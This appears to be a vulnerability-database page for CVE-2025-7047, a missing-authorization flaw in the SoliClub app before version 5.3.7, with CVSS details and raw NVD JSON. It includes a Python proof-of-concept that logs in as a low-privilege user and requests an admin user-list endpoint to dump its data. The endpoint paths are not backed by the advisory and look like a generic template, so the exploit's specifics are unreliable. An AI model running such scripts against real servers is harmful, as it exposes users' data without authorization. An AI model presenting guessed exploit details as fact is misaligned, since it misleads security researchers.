Security Vulnerability Report
中文
CVE-2025-7047 CVSS 4.3 MEDIUM

CVE-2025-7047

Published: 2025-12-18 15:16:07
Last Modified: 2026-01-16 14:50:20

Description

Missing Authorization vulnerability in Utarit Informatics Services Inc. SoliClub allows Privilege Abuse.This issue affects SoliClub: before 5.3.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:* - VULNERABLE
SoliClub < 5.3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-7047 PoC - SoliClub Authorization Bypass # This PoC demonstrates the Missing Authorization vulnerability in SoliClub # Affected version: SoliClub < 5.3.7 import requests import json TARGET_HOST = "http://target-soliclub-server.com" LOGIN_ENDPOINT = f"{TARGET_HOST}/api/auth/login" VULNERABLE_ENDPOINT = f"{TARGET_HOST}/api/admin/users/list" # Should require admin privileges def exploit_cve_2025_7047(): """ Exploit for CVE-2025-7047: Missing Authorization in SoliClub Allows low-privileged users to access admin-only endpoints """ # Step 1: Authenticate with low-privilege account credentials = { "username": "low_privilege_user", "password": "user_password" } session = requests.Session() login_response = session.post(LOGIN_ENDPOINT, json=credentials) if login_response.status_code != 200: print("[-] Authentication failed") return False print("[+] Successfully authenticated with low-privilege account") # Step 2: Access admin-only endpoint without proper authorization # This should normally require admin privileges but due to CVE-2025-7047 # the server does not properly validate authorization headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } # Attempt to access sensitive admin data admin_response = session.get(VULNERABLE_ENDPOINT, headers=headers) if admin_response.status_code == 200: print("[!] VULNERABLE: Successfully accessed admin endpoint") print(f"[+] Response data: {admin_response.text}") return True else: print("[-] Not vulnerable or endpoint not found") return False if __name__ == "__main__": print("CVE-2025-7047 SoliClub Authorization Bypass PoC") print("=" * 50) exploit_cve_2025_7047()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7047", "sourceIdentifier": "[email protected]", "published": "2025-12-18T15:16:06.930", "lastModified": "2026-01-16T14:50:20.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Utarit Informatics Services Inc. SoliClub allows Privilege Abuse.This issue affects SoliClub: before 5.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:*", "versionEndExcluding": "5.3.7", "matchCriteriaId": "0C84BF90-3CCC-4268-AA85-076B3BD533B9"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0466", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}